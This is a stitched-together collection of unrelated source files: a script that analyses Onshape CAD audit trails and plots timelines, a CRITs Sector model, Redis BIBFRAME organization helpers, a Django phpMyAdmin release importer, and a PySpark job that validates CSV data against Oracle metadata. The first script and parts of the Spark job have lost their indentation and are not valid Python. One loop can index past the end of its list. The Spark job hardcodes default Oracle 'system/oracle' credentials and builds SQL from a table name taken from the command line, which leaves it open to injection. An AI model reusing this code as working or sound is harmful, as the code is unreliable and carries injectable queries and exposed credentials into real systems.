"Change size" in data[i][5] or \
"Change part appearance" in data[i][5] or \
"Branch Workspace" in data[i][5] or \
"Suppress" in data[i][5] or \
"Unsuppress" in data[i][5] or \
"Unpack" in data[i][5] or \
"Create variable" in data[i][5] or \
"Insert tab" in data[i][5] or \
"BLOB closed" in data[i][5] or \
"PARTSTUDIO closed" in data[i][5] or \
"Update version" in data[i][5] or \
"Create version" in data[i][5] or \
"Undo : " in data[i][5] or \
"Redo : " in data[i][5] or \
"Tab Part Studio 1 Copy 1 of type PARTSTUDIO created by CAD_Study" in data[i][5]:
#
#data[i][6] = "-"
pass
else:
print("WARNING: Not yet accounted for entry at index: " + str(i) + "\n\tDescription: " + data[i][5])
skippedFeatures.append(("Index: " + str(i) + " - Description: " + data[i][5])) # keep track of all skipped features in a list
#pass
# print the list of entries that are skipped, to catch anything new that's not currently being checked for
if skippedFeatures: # if the skippedFeatures list is empty, then it is FALSE, then the if statement won't print
#print("WARNING: Skipped these entries (indices): " + str(skippedFeatures))
print("WARNING, skipped some entries, check the 'skipped' JSON file")
skippedFeatures.insert(0, "Skipped features indices: ")
fileName = fileName.removesuffix(".csv") # fileName = XX_IDXX_cleaned.csv
jsonFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
jsonFileName = jsonFileName + "_skipped.json"
with open(jsonFileName, 'w') as outfile:
json.dump(skippedFeatures, outfile, indent=0, default=str)
# write cleaned audit trail to a new file
# (if needed) first, create the "filename_cleaned" string
#cleanedFileName = fileName[:-4] + "_cleaned" + fileName[-4:]
# if the function is fed the cleaned filename already then no need to add "_cleaned" to the name
#print("Output file name= " + cleanedFileName)
#parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
# fileName already includes "_cleaned"
outFilePath = os.path.join(os.getcwd(), "Participant_audit_trails", fileName + ".csv")
#print("Output file path: ", outFilePath)
with open(outFilePath, "w", newline="") as out_file:
writer = csv.writer(out_file)
for row in data:
writer.writerow(row)
#print("INFO: Output csv file now includes identified relevant features: " + outFilePath)
############################################################################
#### writing timeseries to json output file for easier manual error checking ####
#print(time_series)
jsonFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
jsonFileName = jsonFileName + "_timeseries.json"
#print(jsonFileName)
with open(jsonFileName, 'w') as outfile:
# indent=0 prints each list item as a new line, makes it easier to visually read
json.dump(time_series, outfile, indent=0, default=str)
#json.dump(time_series, outfile, default=str)
############################################################################
##################### Write HMM list to json output file ###################
HMMFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
HMMFileName = HMMFileName + "_HMM_List.json"
#print(HMMFileName)
with open(HMMFileName, 'w') as outfile:
# indent=0 prints each list item as a new line, makes it easier to visually read
json.dump(HMMList, outfile, indent=0, default=str)
#json.dump(HMMList, outfile, default=str)
###########################################################################
######### Write a separate HMM list with start and ends to output #########
entriesToSkip = [""] #, "Close Drawing"] # can potentially exclude close drawing as well
for row in reversed(data[1:]):
#if row[7]:
if row[7] not in entriesToSkip:
HMMList_StartEnd.append(row[7])
# sometimes we will end up with "open" "open" "closed" "closed", should swap things around to be 2x "open" "closed"
for i in range(len(HMMList_StartEnd)-1):
current = HMMList_StartEnd[i]
        next_entry = HMMList_StartEnd[i+1]
        #print(last)
        if current == "Open Drawing" and next_entry == "Open Drawing":
HMMList_StartEnd[i+1], HMMList_StartEnd[i+2] = HMMList_StartEnd[i+2], HMMList_StartEnd[i+1]
#print("Doubled up!")
HMMFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
HMMFileName = HMMFileName + "_HMM_StartEnd.json"
with open(HMMFileName, 'w') as outfile:
json.dump(HMMList_StartEnd, outfile, indent=0, default=str)
#json.dump(HMMList_StartEnd, outfile, default=str)
#############################################
#### Now deal with creating the eventplot ###
# first, calculate a few derived time values
startTime = data[-1][1]
endTime = data[1][1]
totalTime = endTime - startTime
partstudioTimeAccountedFor = \
sketchCreateTime+featureCreateTime+sketchEditTime+featureEditTime+cancelledCreateTime+cancelledEditTime #+readDrawingTime
unaccountedTime = partstudioTime - partstudioTimeAccountedFor
#print("Unaccounted time: " + str(unaccountedTime))
unaccountedRatio = unaccountedTime / partstudioTime
#print("unaccountedRatio (raw): " + str(unaccountedRatio))
if partstudioTime < partstudioTimeAccountedFor:
print("partstudioTime < partstudioTimeAcocuntedFor! ")
unaccountedTime = 999
unaccountedRatio = 999
##### Append data to existing database #####
database = []
databaseFileName = os.path.join(os.getcwd(), "Analysis_output", "Audit_Trail_Database.csv")
#print(databaseFileName)
with open(databaseFileName, 'r') as csv_file:
data_reader = csv.reader(csv_file)
for row in data_reader:
database.append(row)
# parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
# outFilePath = os.path.join(parentDirectory, "Participant_audit_trails", databaseFileName)
# print("Output file path: ", outFilePath)
rowEntry = [fileName,
totalTime,
partstudioTime,
partstudioTimeAccountedFor,
unaccountedTime,
readDrawingTime,
sketchCreateTime,
featureCreateTime,
sketchEditTime,
featureEditTime,
cancelledCreateTime,
cancelledEditTime,
# unaccounted ratio is a floating point number, want to show it as % in database
round(unaccountedRatio,4)*100,
"Counters ->",
sketchesCreated,
featuresCreated,
operationsCancelled,
sketchesEdited,
featuresEdited,
switchedToDrawing,
movedFeature,
movedRollbackBar,
undoRedo,
createFolder,
renameFeature,
showHide,
deletedFeature
]
# write over existing entry if a row with the same filename already exists
newEntryFlag = True
# iterate through database's first column, if there's an existing entry with the same file name, set flag to False
for index, row in enumerate(database):
#print("Index = " + str(index))
#print("Checking row" + str(index) + " with entry: "+ row[0])
if row[0] == fileName:
database[index] = rowEntry
#print("found, index:" + str(index))
newEntryFlag = False
# otherwise add new row to the end
if newEntryFlag is True:
database.append(rowEntry)
#print("adding new entry to database: \n" + str(rowEntry))
with open(databaseFileName, "w", newline="") as out_file:
writer = csv.writer(out_file)
for row in database:
writer.writerow(row)
##############################################
############## Printing outputs ##############
"""
print("\n### Timers ###")
totalTime = timeConverter(totalTime)
print("Total time spent: " + totalTime[0] + " minutes," + totalTime[1] + " seconds")
readDrawingTime = timeConverter(readDrawingTime)
print("Total readDrawingTime: " + readDrawingTime[0] + " minutes," + readDrawingTime[1] + " seconds")
partstudioTime = timeConverter(partstudioTime)
print("Total partstudioTime (based on Onshape tabs): " + partstudioTime[0] + " minutes," + partstudioTime[1] + " seconds")
#print("Total partstudioTime (raw): " + str(partstudioTime))
partstudioTimeAccountedFor = timeConverter(partstudioTimeAccountedFor)
print("Of which "+ partstudioTimeAccountedFor[0] + " minutes, " + partstudioTimeAccountedFor[1] + " seconds "
"are accounted for with one of the following individual time trackers:")
print("Time unaccounted for (panning, zooming, UI surfing, \nsitting in PS thinking, organizing feature tree, renaming feautres): {:.2%}".format(unaccountedRatio))
print("")
sketchCreateTime = timeConverter(sketchCreateTime)
print("Total sketchCreateTime: " + sketchCreateTime[0] + " minutes," + sketchCreateTime[1] + " seconds")
featureCreateTime = timeConverter(featureCreateTime)
print("Total featureCreateTime: " + featureCreateTime[0] + " minutes," + featureCreateTime[1] + " seconds")
sketchEditTime = timeConverter(sketchEditTime)
print("Total sketchEditTime: " + sketchEditTime[0] + " minutes," + sketchEditTime[1] + " seconds")
featureEditTime = timeConverter(featureEditTime)
print("Total featureEditTime: " + featureEditTime[0] + " minutes," + featureEditTime[1] + " seconds")
cancelledCreateTime = timeConverter(cancelledCreateTime)
print("Total cancelledCreateTime: " + cancelledCreateTime[0] + " minutes," + cancelledCreateTime[1] + " seconds")
cancelledEditTime = timeConverter(cancelledEditTime)
print("Total cancelledEditTime: " + cancelledEditTime[0] + " minutes," + cancelledEditTime[1] + " seconds")
print("\n### Counters ###")
print("sketchesCreated: " + str(sketchesCreated))
print("featuresCreated: " + str(featuresCreated))
print("operationsCancelled: " + str(operationsCancelled))
print("sketchesEdited: " + str(sketchesEdited))
print("featuresEdited: " + str(featuresEdited))
print("switchedToDrawing: " + str(switchedToDrawing))
print("movedFeature: " + str(movedFeature))
print("movedRollbackBar: " + str(movedRollbackBar))
print("undoRedo: " + str(undoRedo))
print("createFolder: " + str(createFolder))
print("renameFeature: " + str(renameFeature))
print("showHide: " + str(showHide))
print("deletedFeature: " + str(deletedFeature))
"""
#print("\nsketch names: ")
#print(*sketchesCreatedNames, sep="\n")
#print(time_series)
# Plotting the time series event plot
#position = [[],[],[],[],[],[],[],[],[],[],[],[],[],[]] # x coordinates, a list of 14 lists
position = [[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]] # x coordinates, a list of 18 lists
# (added 3 extra for plotting different drawings in different colours
for (action, timestamp, duration) in time_series:
if "readDrawingTime - Changes" in action:
for i in range(duration.seconds):
position[17].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 4" in action:
for i in range(duration.seconds):
position[16].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 3" in action:
for i in range(duration.seconds):
position[15].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 2" in action:
for i in range(duration.seconds):
position[14].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 1" in action:
for i in range(duration.seconds):
position[13].append((timestamp - startTime).seconds + i)
elif "sketchCreateTime" in action:
for i in range(duration.seconds):
position[12].append((timestamp - startTime).seconds + i)
elif "featureCreateTime" in action:
for i in range(duration.seconds):
position[11].append((timestamp - startTime).seconds + i)
elif "sketchEditTime" in action:
for i in range(duration.seconds):
position[10].append((timestamp - startTime).seconds + i)
elif "featureEditTime" in action:
for i in range(duration.seconds):
position[9].append((timestamp - startTime).seconds + i)
elif action == "cancelledCreateTime":
for i in range(duration.seconds):
position[8].append((timestamp - startTime).seconds + i)
elif action == "cancelledEditTime":
for i in range(duration.seconds):
position[7].append((timestamp - startTime).seconds + i)
elif action == "moveRollbackBar":
for i in range(duration.seconds):
position[6].append((timestamp - startTime).seconds + i)
elif action == "moveFeature":
for i in range(duration.seconds):
position[5].append((timestamp - startTime).seconds + i)
elif action == "renameFeature":
for i in range(duration.seconds):
position[4].append((timestamp - startTime).seconds + i)
elif action == "undoRedo":
for i in range(duration.seconds):
position[3].append((timestamp - startTime).seconds + i)
elif action == "deletedFeature":
for i in range(duration.seconds):
position[2].append((timestamp - startTime).seconds + i)
elif action == "showHide":
for i in range(duration.seconds):
position[1].append((timestamp - startTime).seconds + i)
elif action == "createFolder":
for i in range(duration.seconds):
position[0].append((timestamp - startTime).seconds + i)
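# Note on the mapping above: rows 0-12 each hold one action type, while rows
# 13-17 (the four drawing steps plus the "Changes" sheet) all share y offset 13
# below, so they are drawn on a single "Read drawing" row and distinguished
# only by colour.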
offset = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 13, 13, 13, 13] # y coordinates, last 4 are for drawings so superimposing them
linelengths1 = 7 * [0.5] + 6 * [0.9] + 5*[0.9] #last 5 controls height of readDrawing bars
colors1 = 7*["orangered"] + 6*["mediumblue"] + ["red"] + ["gold"] + ["lime"] + ["purple"]+ ["blue"]
#Drawing: #1 #2 #3 #4 #changes
plt.rcParams["figure.figsize"] = (10, 5) # Resize the plot
# task2 plots are much shorter in duration, so resize the overall plot to be narrower
if "Task2" in fileName:
plt.rcParams["figure.figsize"] = (8, 5) # Resize the plot
plt.eventplot(position, lineoffsets=offset,linelengths=linelengths1, linewidths= 1, colors=colors1)
y = ["Created folder", "Show/hide", "Deleted feature", "Undo/Redo", "Rename feature", "Move feature",
"Move rollback bar", "Cancelled edit", "Cancelled creation", "Edit PS feature", "Edit sketch",
"Create PS feature", "Create sketch feature", "Read drawing"]
plt.yticks(np.arange(len(y)), y)
plt.xlabel("Time (s)")
# removing "_cleaned" from the plot title
fileName = fileName.removesuffix("_cleaned")
#print(fileName)
# add filename as title
plt.title(fileName, fontdict=None, loc='center', pad=6)
plt.tight_layout()
saveFigLocation = os.path.join(os.getcwd(), "Analysis_output", fileName + "_cleaned")
plt.savefig(saveFigLocation) #, bbox_inches='tight'
#plt.show()
plt.close()
return None
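# --- Illustrative sketch (not part of the original analysis) ---
# The plotting code above expands each tracked action into per-second x
# positions and stacks them on fixed y rows. A minimal, self-contained version
# of that idea is sketched below; the data and labels are invented for
# illustration only and the helper is never called by this script.
def _eventplot_sketch():
    import matplotlib.pyplot as plt
    # one list of event times (in seconds) per tracked category
    positions = [[1, 2, 3, 10, 11], [5, 6, 7], [20, 21, 22, 23]]
    labels = ["sketch create", "feature edit", "read drawing"]
    plt.eventplot(positions, lineoffsets=list(range(len(positions))), linelengths=0.8)
    plt.yticks(list(range(len(labels))), labels)
    plt.xlabel("Time (s)")
    plt.tight_layout()
    plt.show()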
###############################################################################
#fileName = input("Enter file name (with .csv): ")
#fileName = "BT_ID01_Task1.csv"
#read_file(fileName)
# need to run this on the cleaned file
#fileName = fileName+"_cleaned.csv"
#analyzeAuditTrail(fileName)
#"""
for root,dirs,files in os.walk("Participant_audit_trails"):
for name in files:
#print(os.path.join(root, name))
if "cleaned" not in name:
print("\n########################################################")
print("Opening and analyzing: " + name)
read_file(name)
#"""
"""
# for analyzing one specific file
name = "ID01_BT_Task2.csv"
#name = str(os.getcwd()) + "/Participant_audit_trails/" + name
print(name)
read_file(name)
"""
|
the-stack_0_6142 | import logging
from mongoengine import Document
from mongoengine import StringField, IntField
from django.conf import settings
from crits.core.crits_mongoengine import CritsDocument, CritsSchemaDocument
logger = logging.getLogger(__name__)
class Sector(CritsDocument, CritsSchemaDocument, Document):
    """
    CRITs Sector Class
    """

    meta = {
        "collection": settings.COL_SECTOR_LISTS,
        "crits_type": 'Sectorlist',
        "latest_schema_version": 1,
        "schema_doc": {
            'name': 'Sectorlist name',
            'Campaign': 'Integer',
            'Certificate': 'Integer',
            'Domain': 'Integer',
            'Email': 'Integer',
            'Target': 'Integer',
            'Event': 'Integer',
            'IP': 'Integer',
            'Indicator': 'Integer',
            'PCAP': 'Integer',
            'RawData': 'Integer',
            'Sample': 'Integer'
        },
    }

    name = StringField(required=True)
    Campaign = IntField(default=0)
    Certificate = IntField(default=0)
    Domain = IntField(default=0)
    Email = IntField(default=0)
    Event = IntField(default=0)
    Indicator = IntField(default=0)
    IP = IntField(default=0)
    PCAP = IntField(default=0)
    RawData = IntField(default=0)
    Sample = IntField(default=0)
    Target = IntField(default=0)

    def migrate(self):
        """
        Migrate to the latest schema version.
        """
        pass


class SectorObject(CritsDocument, CritsSchemaDocument, Document):
    """
    Sector object class.
    """

    meta = {
        "crits_type": "SectorObject",
        "collection": settings.COL_SECTORS,
        "latest_schema_version": 1,
        "schema_doc": {
            'name': 'The name of the sector',
            'active': 'Enabled in the UI (on/off)',
        }
    }

    name = StringField()
    active = StringField(default="on")
|
the-stack_0_6143 | """
:mod:`redis_helpers` Helper Classes and Functions for managing BIBFrAME
Organization Authorities in the Redis Library Services Platform
"""
__author__ = "Jeremy Nelson"
import re
from bibframe.models import Organization
from person_authority.redis_helpers import process_name
from aristotle.settings import REDIS_DATASTORE
PUNCTUATION_RE = re.compile(r"[^!-~]|[.,;:]")
def add_organization(name_metaphone_keys,
                     org_attributes,
                     redis_datastore=REDIS_DATASTORE):
    """Function adds a BIBFRAME Organization to RLSP

    Function takes a Redis authority instance, the organization's name metaphone
    keys and the organization's attributes to create a BIBFRAME organization
    entity in the RLSP.

    Parameters:
    redis_datastore -- Redis Instance or Redis Cluster
    org_attributes -- Dict of organization's properties
    """
    new_organization = Organization(redis_datastore=redis_datastore)
    for key, value in org_attributes.iteritems():
        setattr(new_organization, key, value)
    new_organization.save()
    for metaphone in name_metaphone_keys:
        redis_datastore.sadd(metaphone, new_organization.redis_key)
    return new_organization


def get_or_add_organization(org_attributes,
                            redis_datastore=REDIS_DATASTORE):
    """
    Function takes a dict of an organization's attributes and either returns an existing
    Organization or creates a new organization based on similarity metric.

    :param org_attributes:
    :param redis_datastore: Redis BIBFRAME Authority instance
    """
    name_metaphones, name_metaphone_keys, org_keys = [], [], []
    normed_location_key, place_keys = None, []
    if 'label' in org_attributes:
        raw_name = org_attributes.get('label')
        name_metaphones = process_name(raw_name)
    name_metaphone_keys = ["organization-metaphone:{0}".format(x) for x in name_metaphones]
    existing_org_keys = redis_datastore.sinter(name_metaphone_keys)
    if len(existing_org_keys) == 0:
        return add_organization(name_metaphone_keys,
                                org_attributes,
                                redis_datastore=redis_datastore)
    else:
        return Organization(redis_key=list(existing_org_keys)[0],
                            redis_datastore=redis_datastore)
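

# --- Illustrative usage (not in the original module) ---
# A sketch of how get_or_add_organization() might be called; the label below is
# invented and a configured Redis datastore is assumed.
def _example_get_or_add():
    org = get_or_add_organization({'label': 'Example Public Library'})
    # A second call with the same label should match via the shared metaphone
    # keys and return the existing Organization rather than creating a new one.
    same_org = get_or_add_organization({'label': 'Example Public Library'})
    return org.redis_key == same_org.redis_key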
|
the-stack_0_6144 | # -*- coding: UTF-8 -*-
# vim: set expandtab sw=4 ts=4 sts=4:
#
# phpMyAdmin web site
#
# Copyright (C) 2008 - 2016 Michal Cihar <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from django.core.management.base import BaseCommand
from django.conf import settings
from dateutil import parser
import json
import os
from glob import glob
from files.models import Release, Download
from bs4 import BeautifulSoup
from files.utils import read_sum
import codecs
from pmaweb.cdn import purge_files_cdn
def glob_downloads(prefix=''):
return (
glob(prefix + '*.zip') +
glob(prefix + '*.7z') +
glob(prefix + '*.tar.gz') +
glob(prefix + '*.tar.bz2') +
glob(prefix + '*.tar.xz')
)
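

# glob_downloads() is used both for release directories (no prefix) and, in
# process_snapshots() below, with a 'phpMyAdmin-<version>' prefix so that only
# one snapshot's archives are matched.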
class Command(BaseCommand):
help = 'Imports files from filesystem'
def process_files(self, path, release, prefix='', force=False):
os.chdir(path)
for filename in glob_downloads(prefix):
download, created = Download.objects.get_or_create(
release=release, filename=filename
)
if not created and not force:
continue
download.release = release
download.size = os.path.getsize(filename)
download.sha1 = read_sum('{0}.sha1'.format(filename))
download.sha256 = read_sum('{0}.sha256'.format(filename))
download.signed = os.path.exists('{0}.asc'.format(filename))
download.save()
def process_releases(self, path):
for version in os.listdir(path):
if version in ('README.rst', 'index.html'):
continue
release, created = Release.objects.get_or_create(version=version)
if created:
self.stdout.write('Added {0}'.format(version))
notes = '{0}/{1}/phpMyAdmin-{1}-notes.html'.format(
path, version
)
if os.path.exists(notes):
with codecs.open(notes, 'r', 'utf-8') as handle:
release.release_notes_markup_type = 'html'
release.release_notes = u'<pre>{0}</pre>'.format(
BeautifulSoup(
handle.read(),
'lxml',
).get_text()
)
release.save()
self.process_files(
os.path.join(path, version),
release
)
def process_snapshots(self, path):
os.chdir(path)
# List current versions
versions = set([x.rsplit('.', 1)[0].split('-')[1] for x in glob('*+snapshot.json')])
# Delete no longer present snapshots
Release.objects.filter(snapshot=True).exclude(version__in=versions).delete()
purge = []
# Process versions
for version in versions:
metafile = os.path.join(
path,
'phpMyAdmin-' + version + '.json'
)
with open(metafile, 'r') as handle:
metadata = json.load(handle)
defaults = {
'snapshot': True,
'release_notes': metadata['commit'],
'release_notes_markup_type': 'plain',
'date': parser.parse(metadata['date']),
}
release, created = Release.objects.get_or_create(
version=version,
defaults=defaults,
)
if created:
self.stdout.write('Added {0}'.format(version))
else:
modified = False
for item in defaults:
if item == 'release_notes':
current = release.release_notes.raw
else:
current = getattr(release, item)
if current != defaults[item]:
setattr(release, item, defaults[item])
modified = True
if modified:
self.stdout.write('Updated {0}'.format(version))
release.save()
self.process_files(
path,
release,
prefix='phpMyAdmin-' + version,
force=True,
)
if modified:
for download in release.download_set.all():
filename = download.__unicode__()
purge.extend([
filename,
'{}.sha1'.format(filename),
'{}.sha256'.format(filename),
])
if purge:
purge_files_cdn(*purge)
def handle(self, *args, **options):
self.process_releases(os.path.join(settings.FILES_PATH, 'phpMyAdmin'))
self.process_snapshots(os.path.join(settings.FILES_PATH, 'snapshots'))
|
the-stack_0_6146 |
"""
;==========================================
; Title: Data Validation with Apache Spark and Python
; Author: Harshal Vasant Dhake
; Date: 15-Aug-2019
;==========================================
"""
from __future__ import print_function
import generateSql
import math
import sys
from pyspark.sql import SparkSession, Row
from pyspark.sql.types import *
from pyspark.sql.functions import regexp_replace, col, udf, when, lit, concat, length
from pyspark import SparkContext
def build_schema(tableName):
"""Build and return a schema to use for the sample data."""
statement = "(select column_name, case when data_type='VARCHAR2' then 'String' when data_type='CHAR' then 'String' when data_type='DATE' then 'String' when data_type='NVARCHAR2' then 'String' when data_type='NUMBER' then 'String' else 'String' end AS data_type, nullable from dba_tab_columns where table_name ='" + tableName + "' order by column_id asc )"
buildSchemaList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
xList = buildSchemaList.collect()
type_map = {'String': StringType(), 'Integer': IntegerType(), 'Date': DateType()}
type_null_map = {'Y': True, 'N': False}
cols = [StructField(x.COLUMN_NAME, type_map.get(x.DATA_TYPE, StringType()), type_null_map.get(x.NULLABLE,True)) for x in xList]
schema = StructType(cols)
return schema
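# --- Illustrative sketch (not part of the original job) ---
# build_schema() derives the StructType above from Oracle's dictionary views;
# the result is equivalent to hand-writing a schema such as the one below
# (column names here are examples only).
def _example_manual_schema():
    return StructType([
        StructField("ORDER_ID", StringType(), False),
        StructField("CUSTOMER_NAME", StringType(), True),
        StructField("ORDER_DATE", StringType(), True),
    ])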
def build_val_col_list(tableName):
"""Build and return a schema to use for the sample data."""
statement = "( SELECT column_name, data_type, case when data_type='NUMBER' THEN NVL(DATA_PRECISION,38) + DATA_SCALE ELSE DATA_LENGTH END AS ORACLE_LENGTH FROM dba_tab_columns WHERE table_name = '" + tableName + "' order by column_id asc )"
buildColTypeList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
xList = buildColTypeList.collect()
return xList
def build_column_type_list(tableName):
"""Build and return a schema to use for the sample data."""
statement = "(select column_name, case when data_type='VARCHAR2' then 'string' when data_type='CHAR' then 'string' when data_type='DATE' then 'date' when data_type='NVARCHAR2' then 'string' when data_type='NUMBER' and data_scale = 0 then 'long' when data_type='NUMBER' and data_scale > 0 then 'decimal('|| data_precision ||','||data_scale ||')' else 'String' end AS data_type from dba_tab_columns where table_name ='" + tableName + "' order by column_id asc )"
buildColTypeList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
xList = buildColTypeList.collect()
print(xList)
return xList
def build_nullable_list(tableName):
statement = "(select column_name from all_tab_columns where nullable = 'N' and table_name= '" + tableName + "' order by column_id asc)t"
nullColList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
stringsDS = nullColList.rdd.map(lambda row: "%s" % (row.COLUMN_NAME))
return stringsDS
# Note: this helper is not called anywhere in this script; the numeric checks
# are done inline in oracle_data_validation() instead.
def checkIntData(columnData):
    status = "GOOD"
    try:
        int(columnData)          # was "columnData.toInt" (Scala-style, not valid Python)
    except (TypeError, ValueError):
        if columnData is None:
            pass                 # missing value: leave status unchanged
        elif len(columnData) == 0:
            status = "ERROR"
        else:
            status = "BAD"
    return status
def build_pk_list():
"""Build and return a schema to use for the sample data."""
statement = "(select a.column_name FROM all_cons_columns a JOIN all_constraints c ON (a.owner = c.owner AND a.constraint_name = c.constraint_name) WHERE c.constraint_type='P' and a.table_name= '" + tableName + "' order by a.position asc ) "
PK = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
stringsDS = PK.rdd.map(lambda row: "%s" % (row.COLUMN_NAME))
countList = 0
for x in stringsDS.collect():
if countList == 0:
columnList = x
countList = countList + 1
else:
columnList = columnList + ',' + x
countList = countList +1
return columnList
def build_uniq_idx_list(tableName):
"""Build and return a schema to use for the sample data."""
statement = "(select a.index_name, listagg (a.column_name, ',') WITHIN GROUP (ORDER BY a.column_position) COLUMN_NAMES FROM dba_ind_columns a, dba_indexes b WHERE a.table_name= '" + tableName + "' AND a.table_name = b.table_name AND a.index_name= b.index_name AND b.uniqueness = 'UNIQUE' AND b.status = 'VALID' group by a.index_name)t"
uindexes = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
return uindexes
def check_tbl_exist(spark, tableName):
query = "(select * from DBA_TABLES WHERE TABLE_NAME ='" + tableName + "')t"
#Read data from Oracle Table
tblCount = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", query) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
returnCount = tblCount.count()
if returnCount == 1:
print('Table '+ tableName + ' exist in Database')
else:
print('Table Name '+ tableName + ' does not exist in database . Kindly check')
exit()
def oracle_data_validation(spark, tableName,fileName):
# $example on:programmatic_schema$
sc = spark.sparkContext
lines = spark.read.option("header", "true") \
.option("delimiter", ",") \
.option("inferSchema", "true") \
.csv(fileName)
lines = sc.textFile(fileName)
parts = lines.map(lambda l: l.split(","))
fileParts = parts.map(lambda p: (p[0], p[1], p[2], p[3], p[4], p[5], p[6], p[7]))
schemaDF = spark.createDataFrame(fileParts, schema=build_schema(tableName))
colTypeList = build_column_type_list(tableName)
schemaDF.printSchema()
#schemaDF = schemaDF.collect()
#schemaDF.show()
colValidationTypeList = build_val_col_list(tableName)
for i in colValidationTypeList:
if (i.DATA_TYPE == 'VARCHAR2') or (i.DATA_TYPE == 'CHAR') or (i.DATA_TYPE == 'NVARCHAR2'):
schemaDF = schemaDF.withColumn(str("STRCHK_")+i.COLUMN_NAME, when(length(col(i.COLUMN_NAME)) > i.ORACLE_LENGTH,lit("String is greater than defined size")).otherwise(lit("None")))
else:
schemaDF = schemaDF.withColumn(str("CHK_")+i.COLUMN_NAME,
when(col(i.COLUMN_NAME).cast("long").isNull() & col(i.COLUMN_NAME).cast("long").isNotNull(),lit("Not a valid Number"))
.when(length(col(i.COLUMN_NAME)) > i.ORACLE_LENGTH ,lit("Column length Mismatch "))
.otherwise(lit("None")))
for i in colTypeList:
if i.DATA_TYPE != 'string' and i.DATA_TYPE != 'date':
schemaDF = schemaDF.withColumn(i.COLUMN_NAME, col(i.COLUMN_NAME).cast(i.DATA_TYPE))
schemaDF.printSchema()
schemaDF.createOrReplaceTempView(tableName)
column_list = build_nullable_list(tableName)
print(schemaDF)
emptyTblSchema = StructType(
[
StructField('tableName', StringType(),True),
StructField('columnName', StringType(), True),
StructField('dataType', StringType(), True),
StructField('precision', StringType(), True),
StructField('scale', StringType(), True),
StructField('dataTypeCheck', StringType(), True),
StructField('minValue', IntegerType(), True),
StructField('maxValue', IntegerType(), True),
StructField('unqCheck', StringType(), True),
StructField('dateFormat', StringType(), True),
StructField('primaryKeyCheck', StringType(), True),
StructField('IndexCheck', StringType(), True),
]
)
explorer = spark.createDataFrame(sc.emptyRDD(), emptyTblSchema)
print(explorer.collect())
schemaDF.show()
null_store = []
# Iterate through all the columns and capture null counts for each column
print('============= Checking for NOT NULL Constraints =======================')
rule_type = 'NOT NULL Check'
results={}
for column_names in column_list.collect():
query = "Select count(1) from " + tableName + " where " + column_names + " is NULL OR " + column_names + " = 'NULL' "
df1 = spark.sql(query).collect()
for i in df1:
results.update(i.asDict())
res_in_num=results['count(1)']
result_store=[rule_type,column_names,res_in_num]
if res_in_num > 0:
print (result_store)
pk_column_list = build_pk_list()
pk_store = []
pk_rule_type = 'primary key check'
print('============= Checking for Primary Key =============================')
results={}
query1 = generateSql.get_unique_sql(tableName, pk_column_list,'')
df2 = spark.sql(query1).collect()
for i in df2:
results.update(i.asDict())
pk_in_num=results['COUNT']
pk_store=[pk_rule_type,pk_column_list,pk_in_num]
print (pk_store)
print('============= Checking for Unique index column ===============')
UI = build_uniq_idx_list(tableName)
stringsDS = UI.rdd.map(lambda row: "%s" % (row.COLUMN_NAMES))
unique_idx_rule_type = 'Unique index check'
results3={}
for i in stringsDS.collect():
query3 = generateSql.get_unique_sql(tableName, i,'')
df3 = spark.sql(query3).collect()
for j in df3:
results3.update(j.asDict())
res_in_num=results3['COUNT']
result_store3=[unique_idx_rule_type,i,res_in_num]
print (result_store3)
if __name__ == "__main__":
# $example on:init_session$
spark = SparkSession \
.builder \
.appName("Python Spark SQL data source example") \
.getOrCreate()
#basic_df_example(spark)
#schema_inference_example(spark)
spark.sparkContext.setLogLevel("ERROR")
tableName = sys.argv[1].strip()
print(tableName)
check_tbl_exist(spark, tableName)
fileName = sys.argv[2].strip()
print(fileName)
oracle_data_validation(spark,tableName,fileName)
